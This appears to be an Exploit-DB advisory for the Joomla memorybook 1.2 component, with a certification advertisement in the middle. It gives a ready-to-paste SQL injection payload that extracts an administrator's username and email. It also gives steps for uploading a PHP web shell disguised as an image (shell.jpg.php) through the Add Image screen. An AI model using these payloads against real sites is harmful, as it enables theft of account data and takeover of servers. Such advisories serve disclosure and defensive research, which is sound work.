Joomla! Component memorybook 1.2 - Multiple Vulnerabilities

EDB-ID:

10731

CVE:



Author:

jdc

Type:

webapps


Platform:

PHP

Date:

2009-12-27


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

SQL Injection
-------------

requires: magic quotes OFF, user account

Add this as the description of a new event:

'), ( 63,(SELECT CONCAT(username,0x20,email) FROM #__users WHERE gid=25 
LIMIT 1),1,1,1) -- '

NOTE: 63 MUST be your Joomla user ID. extracted info can be found on 
View Events page


Remote File Inclusion
---------------------

requires: user account

Just upload your PHP shell (shell.jpg.php) through the Add Image screen, 
and find it's new URL in the View Images screen.